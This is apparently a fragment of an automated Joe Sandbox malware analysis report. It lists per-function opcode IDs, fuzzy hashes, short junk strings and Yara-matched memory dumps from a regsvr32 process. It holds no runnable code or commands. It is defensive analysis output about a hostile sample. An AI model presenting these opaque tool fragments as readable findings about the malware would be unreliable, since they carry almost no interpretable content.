                                                                                                          • Opcode ID: d053b19ec2bcb7975f54130f0bec91227afaf154fd553d0fa3630ba3df2317cc
                                                                                                          • Instruction ID: dce8fc045a4a04f83c30b3cdfe6a80b693f4cc1213c11d5d912c690a7616fc9d
                                                                                                          • Opcode Fuzzy Hash: d053b19ec2bcb7975f54130f0bec91227afaf154fd553d0fa3630ba3df2317cc
                                                                                                          • Instruction Fuzzy Hash: CC41C0B090074A8BDF48CF68C8865DE7FB0FB68348F51461DE84AA6290D37896A4CFC4
                                                                                                          Uniqueness

                                                                                                          Uniqueness Score: -1.00%

                                                                                                          Strings
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000007.00000002.435079769.0000000000C81000.00000020.00001000.00020000.00000000.sdmp, Offset: 00C81000, based on PE: false
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_7_2_c81000_regsvr32.jbxd
                                                                                                          Yara matches
                                                                                                          Similarity
                                                                                                          • API ID:
                                                                                                          • String ID: =$N@`Y$`Y
                                                                                                          • API String ID: 0-2183226064
                                                                                                          • Opcode ID: d2df9a4b86a3a0f31adfb1a7bc02e0a1df19d01470a0e79ca81506aab5c400ca
                                                                                                          • Instruction ID: 28b2d76cfad006cbd6f79002ccf78f668cc7cb5674b892bf66f262748260d81d
                                                                                                          • Opcode Fuzzy Hash: d2df9a4b86a3a0f31adfb1a7bc02e0a1df19d01470a0e79ca81506aab5c400ca
                                                                                                          • Instruction Fuzzy Hash: 6151D3B190074E8FDB44DF68C88A4DE7FB0FB68398F204619F856A6250D3B496A4CFD4
                                                                                                          Uniqueness

                                                                                                          Uniqueness Score: -1.00%

                                                                                                          Strings
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000007.00000002.435079769.0000000000C81000.00000020.00001000.00020000.00000000.sdmp, Offset: 00C81000, based on PE: false
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_7_2_c81000_regsvr32.jbxd
                                                                                                          Yara matches
                                                                                                          Similarity
                                                                                                          • API ID:
                                                                                                          • String ID: '0$~?$\
                                                                                                          • API String ID: 0-629757258
                                                                                                          • Opcode ID: 954a36b238481698c7266dd80e523f1c680ea4ba7fc80669a00137daf7e51e24
                                                                                                          • Instruction ID: 136dca0c79156d21ce2cea7dca51456708d431d91fab982f1f5b90389e43eaa5
                                                                                                          • Opcode Fuzzy Hash: 954a36b238481698c7266dd80e523f1c680ea4ba7fc80669a00137daf7e51e24
                                                                                                          • Instruction Fuzzy Hash: E641CEB0548B818BE718DF28C59A51ABBF1FBC5344F604A2DF6968A3A0D774D885CF42
                                                                                                          Uniqueness

                                                                                                          Uniqueness Score: -1.00%

                                                                                                          Strings
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000007.00000002.435079769.0000000000C81000.00000020.00001000.00020000.00000000.sdmp, Offset: 00C81000, based on PE: false
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_7_2_c81000_regsvr32.jbxd
                                                                                                          Yara matches
                                                                                                          Similarity
                                                                                                          • API ID:
                                                                                                          • String ID: A7$z$~*b
                                                                                                          • API String ID: 0-275545515
                                                                                                          • Opcode ID: b8479da6f0f4b7c6bcd662b5c54a20f953bf565876b4d716e1e2544701f062c2
                                                                                                          • Instruction ID: 2d76ba32b73c497e31d998fe6ce759eacccfe4de69ede258398e9c019113573c
                                                                                                          • Opcode Fuzzy Hash: b8479da6f0f4b7c6bcd662b5c54a20f953bf565876b4d716e1e2544701f062c2
                                                                                                          • Instruction Fuzzy Hash: A341C4B180074ECFDB48CF64C48A5DE7FB0FB64398F204619E855A6250D3B896A9CFD5
                                                                                                          Uniqueness

                                                                                                          Uniqueness Score: -1.00%

                                                                                                          Strings
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000007.00000002.435079769.0000000000C81000.00000020.00001000.00020000.00000000.sdmp, Offset: 00C81000, based on PE: false
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_7_2_c81000_regsvr32.jbxd
                                                                                                          Yara matches
                                                                                                          Similarity
                                                                                                          • API ID:
                                                                                                          • String ID: H$rTk=${,%
                                                                                                          • API String ID: 0-3174111592
                                                                                                          • Opcode ID: cd8ee6c86ca05777d6c328effcc2208a9f98b66aff3d67038adbddc0681d1a7c
                                                                                                          • Instruction ID: a86527b7c450a19ea8273521d34e87716d5dfb5925fb974fcc9a3143a5a216f6
                                                                                                          • Opcode Fuzzy Hash: cd8ee6c86ca05777d6c328effcc2208a9f98b66aff3d67038adbddc0681d1a7c
                                                                                                          • Instruction Fuzzy Hash: 67310670528785ABD798DF28C4C991EBBE1FBC4354F906A1DF882862A0C779C845CB03
                                                                                                          Uniqueness

                                                                                                          Uniqueness Score: -1.00%

                                                                                                          APIs
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000007.00000002.435175242.0000000180001000.00000020.00000001.01000000.00000008.sdmp, Offset: 0000000180000000, based on PE: true
                                                                                                          • Associated: 00000007.00000002.435170036.0000000180000000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                          • Associated: 00000007.00000002.435186833.0000000180016000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                          • Associated: 00000007.00000002.435222239.0000000180021000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                          • Associated: 00000007.00000002.435229461.0000000180023000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_7_2_180000000_regsvr32.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: ExceptionRaise_clrfp
                                                                                                          • String ID:
                                                                                                          • API String ID: 15204871-0
                                                                                                          • Opcode ID: 8a2068e512ce5aafa66155c105f3cea9dfcd9c81dc28570226bd282595299ab9
                                                                                                          • Instruction ID: df89035e7e7b250386178c13d978bdab97caeca02fa44d79d4a04f1db2bf885c
                                                                                                          • Opcode Fuzzy Hash: 8a2068e512ce5aafa66155c105f3cea9dfcd9c81dc28570226bd282595299ab9
                                                                                                          • Instruction Fuzzy Hash: BCB12C77610B888BEB56CF29C8463987BA0F348B88F15C915EB59877A8CF39C955CB01
                                                                                                          Uniqueness

                                                                                                          Uniqueness Score: -1.00%

                                                                                                          APIs
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000007.00000002.435175242.0000000180001000.00000020.00000001.01000000.00000008.sdmp, Offset: 0000000180000000, based on PE: true
                                                                                                          • Associated: 00000007.00000002.435170036.0000000180000000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                          • Associated: 00000007.00000002.435186833.0000000180016000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                          • Associated: 00000007.00000002.435222239.0000000180021000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                          • Associated: 00000007.00000002.435229461.0000000180023000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_7_2_180000000_regsvr32.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: LinkObjectOpenSymbolic
                                                                                                          • String ID:
                                                                                                          • API String ID: 3706036087-0
                                                                                                          • Opcode ID: ba3160d82893de1fb7ee1bf22b66471d9f6f3cf414538ac49248103606f94efb
                                                                                                          • Instruction ID: f4502f775a5e45d64f420efd52fcf5a6929529857e1dcb94e78d5b08d8e8d060
                                                                                                          • Opcode Fuzzy Hash: ba3160d82893de1fb7ee1bf22b66471d9f6f3cf414538ac49248103606f94efb
                                                                                                          • Instruction Fuzzy Hash: 23E0C230B1896842F7EA96BAAC017AB1051A34D7C0F70D429BA02C80C0DCA9C3894704
                                                                                                          Uniqueness

                                                                                                          Uniqueness Score: -1.00%

                                                                                                          Strings
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000007.00000002.435079769.0000000000C81000.00000020.00001000.00020000.00000000.sdmp, Offset: 00C81000, based on PE: false
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_7_2_c81000_regsvr32.jbxd
                                                                                                          Yara matches
                                                                                                          Similarity
                                                                                                          • API ID:
                                                                                                          • String ID: D?"$8zfK
                                                                                                          • API String ID: 0-617590365
                                                                                                          • Opcode ID: f58a98b4df58fdce72c0e7885dd3d804ba7ef7258294e614851e5dfa350b3c1c
                                                                                                          • Instruction ID: 2cb519594dbb619eaea9196d2e54ce7adade0f51af151251e5d681ac89713985
                                                                                                          • Opcode Fuzzy Hash: f58a98b4df58fdce72c0e7885dd3d804ba7ef7258294e614851e5dfa350b3c1c
                                                                                                          • Instruction Fuzzy Hash: 1B1202B560560DCBDB68DF38C48A49E3BE0FF58308F205129FC269B2A2D774D965CB85
                                                                                                          Uniqueness

                                                                                                          Uniqueness Score: -1.00%

                                                                                                          Strings
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000007.00000002.435079769.0000000000C81000.00000020.00001000.00020000.00000000.sdmp, Offset: 00C81000, based on PE: false
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_7_2_c81000_regsvr32.jbxd
                                                                                                          Yara matches
                                                                                                          Similarity
                                                                                                          • API ID:
                                                                                                          • String ID: #X$h}
                                                                                                          • API String ID: 0-3021649463
                                                                                                          • Opcode ID: b2db15c3223b800cd4780d66961112dd0400bb09218d3434ebea1e418095f42e
                                                                                                          • Instruction ID: 39540b78c8bc63d735aeb85def72b3ac70806d0df06e7a6c17c89ca29b5c67a1
                                                                                                          • Opcode Fuzzy Hash: b2db15c3223b800cd4780d66961112dd0400bb09218d3434ebea1e418095f42e
                                                                                                          • Instruction Fuzzy Hash: AB22A6709093888BEBF8DF24C889AD97BF0FF44704F90651ED84E9A690DB786645CF46
                                                                                                          Uniqueness

                                                                                                          Uniqueness Score: -1.00%

                                                                                                          Strings
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000007.00000002.435079769.0000000000C81000.00000020.00001000.00020000.00000000.sdmp, Offset: 00C81000, based on PE: false
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_7_2_c81000_regsvr32.jbxd
                                                                                                          Yara matches
                                                                                                          Similarity
                                                                                                          • API ID:
                                                                                                          • String ID: #X$+ <
                                                                                                          • API String ID: 0-1007305072
                                                                                                          • Opcode ID: 3c586b07ab88afffe82ef26e7c4153d46f18f2014baa5345a66543dbad760a18
                                                                                                          • Instruction ID: 68e50d3495f23e147679d9b6335942d9a21b862024abed2e2e23e6e5830470fe
                                                                                                          • Opcode Fuzzy Hash: 3c586b07ab88afffe82ef26e7c4153d46f18f2014baa5345a66543dbad760a18
                                                                                                          • Instruction Fuzzy Hash: 870278B5900709CFDB88CF68C58A5DD7BB9FB59308F404129FC1E9A2A0D3B4E919CB56
                                                                                                          Uniqueness

                                                                                                          Uniqueness Score: -1.00%

                                                                                                          Strings
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000007.00000002.435079769.0000000000C81000.00000020.00001000.00020000.00000000.sdmp, Offset: 00C81000, based on PE: false
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_7_2_c81000_regsvr32.jbxd
                                                                                                          Yara matches
                                                                                                          Similarity
                                                                                                          • API ID:
                                                                                                          • String ID: Hc$aYG
                                                                                                          • API String ID: 0-2147329803
                                                                                                          • Opcode ID: df90cc9616f2b9c1c24e5989ebcf8fe6102b1266bf85ba7b7bee55ae89225232
                                                                                                          • Instruction ID: 243cad398dd911dc41a0dea676f35583854b15e25be3f75758645d07646aca9f
                                                                                                          • Opcode Fuzzy Hash: df90cc9616f2b9c1c24e5989ebcf8fe6102b1266bf85ba7b7bee55ae89225232
                                                                                                          • Instruction Fuzzy Hash: 63D1117560170DCBDF68CF28C58A59E3BE4FF54308F504129FC1A862A5D7B8E829CB46
                                                                                                          Uniqueness

                                                                                                          Uniqueness Score: -1.00%

                                                                                                          Strings
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000007.00000002.435079769.0000000000C81000.00000020.00001000.00020000.00000000.sdmp, Offset: 00C81000, based on PE: false
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_7_2_c81000_regsvr32.jbxd
                                                                                                          Yara matches
                                                                                                          Similarity
                                                                                                          • API ID:
                                                                                                          • String ID: Ip$2/
                                                                                                          • API String ID: 0-2558650176
                                                                                                          • Opcode ID: e91aca82e16051f92f6dbdf3cee4f537082049766ade2dd9d76858b25ebc0c60
                                                                                                          • Instruction ID: e8b4f6d175c1174f3296099bf8ccb533cc3658ae37396e9ff7518f8f7da7dae1
                                                                                                          • Opcode Fuzzy Hash: e91aca82e16051f92f6dbdf3cee4f537082049766ade2dd9d76858b25ebc0c60
                                                                                                          • Instruction Fuzzy Hash: 04E1D570505B888FEBB8DF28CC89BEF7BA0FB8430AF10551AD8499E290DB745645CF45
                                                                                                          Uniqueness

                                                                                                          Uniqueness Score: -1.00%

                                                                                                          Strings
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000007.00000002.435079769.0000000000C81000.00000020.00001000.00020000.00000000.sdmp, Offset: 00C81000, based on PE: false
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_7_2_c81000_regsvr32.jbxd
                                                                                                          Yara matches
                                                                                                          Similarity
                                                                                                          • API ID: CreateProcess
                                                                                                          • String ID: h$j-`
                                                                                                          • API String ID: 963392458-2572860821
                                                                                                          • Opcode ID: 7cf89bdd1f68ee687de5045feafb6fc4a467e2c1ecf066370c920de17f50795b
                                                                                                          • Instruction ID: 8c525cdfc06c9e13c19d2b39a412a2804749b4ce30619fe50fb64833bb98fb5a
                                                                                                          • Opcode Fuzzy Hash: 7cf89bdd1f68ee687de5045feafb6fc4a467e2c1ecf066370c920de17f50795b
                                                                                                          • Instruction Fuzzy Hash: 37C1E471904788CFDF6CDFA8C88A59DBBB1FB58308F20421DE916AB661DBB49845CF41
                                                                                                          Uniqueness

                                                                                                          Uniqueness Score: -1.00%

                                                                                                          Strings
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000007.00000002.435079769.0000000000C81000.00000020.00001000.00020000.00000000.sdmp, Offset: 00C81000, based on PE: false
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_7_2_c81000_regsvr32.jbxd
                                                                                                          Yara matches
                                                                                                          Similarity
                                                                                                          • API ID:
                                                                                                          • String ID: #z$UP
                                                                                                          • API String ID: 0-3609392360
                                                                                                          • Opcode ID: 550135c457ce9de0a38fa7ba25efe375c5c92efa4962973150589f83c0e84419
                                                                                                          • Instruction ID: 24df3f578a5982eece26c2ba2f2bf691b514dca2905e74e3c0f22f66abde1585
                                                                                                          • Opcode Fuzzy Hash: 550135c457ce9de0a38fa7ba25efe375c5c92efa4962973150589f83c0e84419
                                                                                                          • Instruction Fuzzy Hash: D8A13771904609DBDF58DFA8E4CA49EBBB0FB64388F20411DF856A72A0C7749A95CFC1
                                                                                                          Uniqueness

                                                                                                          Uniqueness Score: -1.00%

                                                                                                          Strings
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000007.00000002.435079769.0000000000C81000.00000020.00001000.00020000.00000000.sdmp, Offset: 00C81000, based on PE: false
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_7_2_c81000_regsvr32.jbxd
                                                                                                          Yara matches
                                                                                                          Similarity
                                                                                                          • API ID:
                                                                                                          • String ID: )bkr$z~
                                                                                                          • API String ID: 0-4035444816
                                                                                                          • Opcode ID: 5b38f0d840313d9f3ca574d07702ced70b63c221434e660478dd8723dd507398
                                                                                                          • Instruction ID: e3e661dd7ba96eb438c73899ceb9df93e3a9ee5291435d92307001ca4da8fabf
                                                                                                          • Opcode Fuzzy Hash: 5b38f0d840313d9f3ca574d07702ced70b63c221434e660478dd8723dd507398
                                                                                                          • Instruction Fuzzy Hash: 0B8161715147898FDBB8CF28CC867D937A0FB46318F608219D88ECE291DF785A49DB41
                                                                                                          Uniqueness

                                                                                                          Uniqueness Score: -1.00%

                                                                                                          Strings
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000007.00000002.435079769.0000000000C81000.00000020.00001000.00020000.00000000.sdmp, Offset: 00C81000, based on PE: false
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_7_2_c81000_regsvr32.jbxd
                                                                                                          Yara matches
                                                                                                          Similarity
                                                                                                          • API ID:
                                                                                                          • String ID: aK>$NM
                                                                                                          • API String ID: 0-1076587397
                                                                                                          • Opcode ID: c3bac648abfba249b47852098d41859ba07369c2655e972e771b32b502ff7dc2
                                                                                                          • Instruction ID: e3e405ee6cb0865adad15f264a3922edd59b32981092ffff27c2c04300ac3db9
                                                                                                          • Opcode Fuzzy Hash: c3bac648abfba249b47852098d41859ba07369c2655e972e771b32b502ff7dc2
                                                                                                          • Instruction Fuzzy Hash: ACB144B590030DCFDB98CF28C18A58D7BB8FB55348F505129FC1E9A2A1E3B5E614CB56
                                                                                                          Uniqueness

                                                                                                          Uniqueness Score: -1.00%

                                                                                                          Strings
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000007.00000002.435079769.0000000000C81000.00000020.00001000.00020000.00000000.sdmp, Offset: 00C81000, based on PE: false
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_7_2_c81000_regsvr32.jbxd
                                                                                                          Yara matches
                                                                                                          Similarity
                                                                                                          • API ID:
                                                                                                          • String ID: GcX$cy5X
                                                                                                          • API String ID: 0-3427037236
                                                                                                          • Opcode ID: 31dac3876fb2c8203566e989269622a41f053c7142211a7d3c88141b18e189f4
                                                                                                          • Instruction ID: 8ad22700767e8d2493ad815ba93443b84058c6c937a4cb5a9cab06b87c174d14
                                                                                                          • Opcode Fuzzy Hash: 31dac3876fb2c8203566e989269622a41f053c7142211a7d3c88141b18e189f4
                                                                                                          • Instruction Fuzzy Hash: BDA1C6B0548388CBEBBEDF34C89A6D93BA9FB44B04F504619E85E8E290DF749745CB41
                                                                                                          Uniqueness

                                                                                                          Uniqueness Score: -1.00%

                                                                                                          Strings
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000007.00000002.435079769.0000000000C81000.00000020.00001000.00020000.00000000.sdmp, Offset: 00C81000, based on PE: false
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_7_2_c81000_regsvr32.jbxd
                                                                                                          Yara matches
                                                                                                          Similarity
                                                                                                          • API ID:
                                                                                                          • String ID: &$U
                                                                                                          • API String ID: 0-326847644
                                                                                                          • Opcode ID: abfcacae90548ec85c0fd9e6913092660ec18354f469de3349c35ab14c6f872b
                                                                                                          • Instruction ID: 471cca1c76894e78308bc434481517f3265aebdd9203b8d7b9cb5cde437aa49b
                                                                                                          • Opcode Fuzzy Hash: abfcacae90548ec85c0fd9e6913092660ec18354f469de3349c35ab14c6f872b
                                                                                                          • Instruction Fuzzy Hash: 0C9169B590038E8FDF48CF68D88A5DE7BB0FB14348F104A19FC66AA250D7B4D665CB94
                                                                                                          Uniqueness

                                                                                                          Uniqueness Score: -1.00%

                                                                                                          Strings
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000007.00000002.435079769.0000000000C81000.00000020.00001000.00020000.00000000.sdmp, Offset: 00C81000, based on PE: false
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_7_2_c81000_regsvr32.jbxd
                                                                                                          Yara matches
                                                                                                          Similarity
                                                                                                          • API ID:
                                                                                                          • String ID: k' {$z5
                                                                                                          • API String ID: 0-3484172565
                                                                                                          • Opcode ID: 0e04fcac124a95f8f36ba453d1c940f3a314ae21d4948ab7b59fa2d7b687fabd
                                                                                                          • Instruction ID: 6071e8b2b7e1833649013dd73123ee859349d5872a7a050af28d329503571974
                                                                                                          • Opcode Fuzzy Hash: 0e04fcac124a95f8f36ba453d1c940f3a314ae21d4948ab7b59fa2d7b687fabd
                                                                                                          • Instruction Fuzzy Hash: 7371E7705007498FDB58DF24C88A5DE7BA1FB58358F114329FC8AAB250D778D954CBC9
                                                                                                          Uniqueness

                                                                                                          Uniqueness Score: -1.00%

                                                                                                          Strings
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000007.00000002.435079769.0000000000C81000.00000020.00001000.00020000.00000000.sdmp, Offset: 00C81000, based on PE: false
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_7_2_c81000_regsvr32.jbxd
                                                                                                          Yara matches
                                                                                                          Similarity
                                                                                                          • API ID:
                                                                                                          • String ID: 6$D
                                                                                                          • API String ID: 0-3309211938
                                                                                                          • Opcode ID: 28cfe374c9252ae38f661a0063e52509a8c1d1e6d70719d53b6096594a4bb1b4
                                                                                                          • Instruction ID: fdcef399315fb4ebe440653d4ddbe4fb557c86b21a380698fc3b5d78daed851d
                                                                                                          • Opcode Fuzzy Hash: 28cfe374c9252ae38f661a0063e52509a8c1d1e6d70719d53b6096594a4bb1b4
                                                                                                          • Instruction Fuzzy Hash: DB5139705247899BEB98DF28DC899993BE4FB05308F90626DFC46C7292C774D886CB45
                                                                                                          Uniqueness

                                                                                                          Uniqueness Score: -1.00%

                                                                                                          Strings
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000007.00000002.435079769.0000000000C81000.00000020.00001000.00020000.00000000.sdmp, Offset: 00C81000, based on PE: false
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_7_2_c81000_regsvr32.jbxd
                                                                                                          Yara matches
                                                                                                          Similarity
                                                                                                          • API ID:
                                                                                                          • String ID: #T$(Pv0
                                                                                                          • API String ID: 0-2531358951
                                                                                                          • Opcode ID: 75b81112f69fa21036012adbd1b3eca6c2c2cdc881b6fb35e88803ec9910d9b1
                                                                                                          • Instruction ID: adab223f8d2088087e18ead850f999aeb84d6eda2722431a755ab775d671fca7
                                                                                                          • Opcode Fuzzy Hash: 75b81112f69fa21036012adbd1b3eca6c2c2cdc881b6fb35e88803ec9910d9b1
                                                                                                          • Instruction Fuzzy Hash: 0A510DB050070E8BDF58DF14C88A4DE3BA0FB6839CF251619EC5A96294D378DA95CFC9
                                                                                                          Uniqueness

                                                                                                          Uniqueness Score: -1.00%

                                                                                                          Strings
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000007.00000002.435079769.0000000000C81000.00000020.00001000.00020000.00000000.sdmp, Offset: 00C81000, based on PE: false
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_7_2_c81000_regsvr32.jbxd
                                                                                                          Yara matches
                                                                                                          Similarity
                                                                                                          • API ID:
                                                                                                          • String ID: $$%9
                                                                                                          • API String ID: 0-3031553271
                                                                                                          • Opcode ID: a2fbf9250aa57a4feebe03f3fe744e7023f0b6fc9b26e85352855d54e5bc5225
                                                                                                          • Instruction ID: 42850a989331f5c80672f697c2e87c6cee03dc8429221a5a9e99ecf116158ae9
                                                                                                          • Opcode Fuzzy Hash: a2fbf9250aa57a4feebe03f3fe744e7023f0b6fc9b26e85352855d54e5bc5225
                                                                                                          • Instruction Fuzzy Hash: 4B413F7061CB84ABDB98DF19C0D961FBAE1FB84754F905A2EF486C7391C738CA448B46
                                                                                                          Uniqueness

                                                                                                          Uniqueness Score: -1.00%

                                                                                                          Strings
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000007.00000002.435079769.0000000000C81000.00000020.00001000.00020000.00000000.sdmp, Offset: 00C81000, based on PE: false
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_7_2_c81000_regsvr32.jbxd
                                                                                                          Yara matches
                                                                                                          Similarity
                                                                                                          • API ID:
                                                                                                          • String ID: gd$s=z
                                                                                                          • API String ID: 0-3301279615
                                                                                                          • Opcode ID: 9e0a1eb710f150882f220fbe0277e01504bf60581961d70543420594e9a038f4
                                                                                                          • Instruction ID: 87e56fead9661a68bacef954ebe6b8fe7da596ff6674e9c98bba4274de6273ab
                                                                                                          • Opcode Fuzzy Hash: 9e0a1eb710f150882f220fbe0277e01504bf60581961d70543420594e9a038f4
                                                                                                          • Instruction Fuzzy Hash: 6351E1B190030A8FDB48DF68D48A5DE7FB1FB68388F204219F856A6250D37886A4CFD5
                                                                                                          Uniqueness

                                                                                                          Uniqueness Score: -1.00%

                                                                                                          Strings
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000007.00000002.435079769.0000000000C81000.00000020.00001000.00020000.00000000.sdmp, Offset: 00C81000, based on PE: false
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_7_2_c81000_regsvr32.jbxd
                                                                                                          Yara matches
                                                                                                          Similarity
                                                                                                          • API ID:
                                                                                                          • String ID: !oW!$ke&Q
                                                                                                          • API String ID: 0-419570616
                                                                                                          • Opcode ID: e2a8cd98534a9e183c53210f0dafbd08af185e336335754ed42f3b5ed718b376
                                                                                                          • Instruction ID: 32a7fcba0c0e62661645fc654f41f21c396106e7964d0f470b07e92e0bf9f597
                                                                                                          • Opcode Fuzzy Hash: e2a8cd98534a9e183c53210f0dafbd08af185e336335754ed42f3b5ed718b376
                                                                                                          • Instruction Fuzzy Hash: C351C5B090074E8FDB48CF68C88A5DE7FB0FB68398F104619EC55A6290D7B496A5CFD4
                                                                                                          Uniqueness

                                                                                                          Uniqueness Score: -1.00%

                                                                                                          Strings
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000007.00000002.435079769.0000000000C81000.00000020.00001000.00020000.00000000.sdmp, Offset: 00C81000, based on PE: false
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_7_2_c81000_regsvr32.jbxd
                                                                                                          Yara matches
                                                                                                          Similarity
                                                                                                          • API ID:
                                                                                                          • String ID: ?j|$P
                                                                                                          • API String ID: 0-615948335
                                                                                                          • Opcode ID: 9620d1bc63c4dfd4b8964090179e5af9b100705a6683f45fc5812d04fd3ae6d4
                                                                                                          • Instruction ID: 506808250facbf7de8b48916f3bb99032a8b5597d57ee3937585e277dbded7a5
                                                                                                          • Opcode Fuzzy Hash: 9620d1bc63c4dfd4b8964090179e5af9b100705a6683f45fc5812d04fd3ae6d4
                                                                                                          • Instruction Fuzzy Hash: BA41D3B090074A8FDB48CF64C48A5DE7FB1FB68388F50461DE816A6390D77896A4CFD5
                                                                                                          Uniqueness

                                                                                                          Uniqueness Score: -1.00%

                                                                                                          Strings
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000007.00000002.435079769.0000000000C81000.00000020.00001000.00020000.00000000.sdmp, Offset: 00C81000, based on PE: false
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_7_2_c81000_regsvr32.jbxd
                                                                                                          Yara matches
                                                                                                          Similarity
                                                                                                          • API ID:
                                                                                                          • String ID: %$aI
                                                                                                          • API String ID: 0-3604358270
                                                                                                          • Opcode ID: ea798d718599b15374f3be6d712fc75d69b65069e54809637e576d117a3edd33
                                                                                                          • Instruction ID: 0fd798837ef1929969e70a70af912787451f954e2e4dcaa5d98f9e750440dc3e
                                                                                                          • Opcode Fuzzy Hash: ea798d718599b15374f3be6d712fc75d69b65069e54809637e576d117a3edd33
                                                                                                          • Instruction Fuzzy Hash: 8F41C6B190038A8BCB48DF64C99A5DE7BB1FB48358F114A2DF86697350D3B49664CF84
                                                                                                          Uniqueness

                                                                                                          Uniqueness Score: -1.00%

                                                                                                          Strings
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000007.00000002.435079769.0000000000C81000.00000020.00001000.00020000.00000000.sdmp, Offset: 00C81000, based on PE: false
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_7_2_c81000_regsvr32.jbxd
                                                                                                          Yara matches
                                                                                                          Similarity
                                                                                                          • API ID:
                                                                                                          • String ID: j$[
                                                                                                          • API String ID: 0-3696242357
                                                                                                          • Opcode ID: d41960ad032d02aa43a06cacd4c3fdf514c501a5b8f19463d910750cf599ef8a
                                                                                                          • Instruction ID: f572b4f11ca199b289ccf0fff4a14a5d82c02f49d4fd8ac4f4a0f3835fafa00f
                                                                                                          • Opcode Fuzzy Hash: d41960ad032d02aa43a06cacd4c3fdf514c501a5b8f19463d910750cf599ef8a
                                                                                                          • Instruction Fuzzy Hash: B341F4B090074E8BDB48DF64C48A5DE3FB1FB58398F11861DE856A6290D3B4D6A4CBC1
                                                                                                          Uniqueness

                                                                                                          Uniqueness Score: -1.00%

                                                                                                          Strings
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000007.00000002.435079769.0000000000C81000.00000020.00001000.00020000.00000000.sdmp, Offset: 00C81000, based on PE: false
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_7_2_c81000_regsvr32.jbxd
                                                                                                          Yara matches
                                                                                                          Similarity
                                                                                                          • API ID:
                                                                                                          • String ID: + $S"
                                                                                                          • API String ID: 0-2880694137
                                                                                                          • Opcode ID: 0a120380ba46ade300821e018fa54fd0c93605979f7eaf18b3fcea56eb471111
                                                                                                          • Instruction ID: 1363c2d6f1c5937de706ca59de9a7b45b86f9a4901bda0756fec3fc3976f1789
                                                                                                          • Opcode Fuzzy Hash: 0a120380ba46ade300821e018fa54fd0c93605979f7eaf18b3fcea56eb471111
                                                                                                          • Instruction Fuzzy Hash: C451B5B090078E8FDF88DF64C88A5DE7BB0FB58358F10461DE866A6250D3B89665CF85
                                                                                                          Uniqueness

                                                                                                          Uniqueness Score: -1.00%

                                                                                                          Strings
                                                                                                          Memory Dump Source
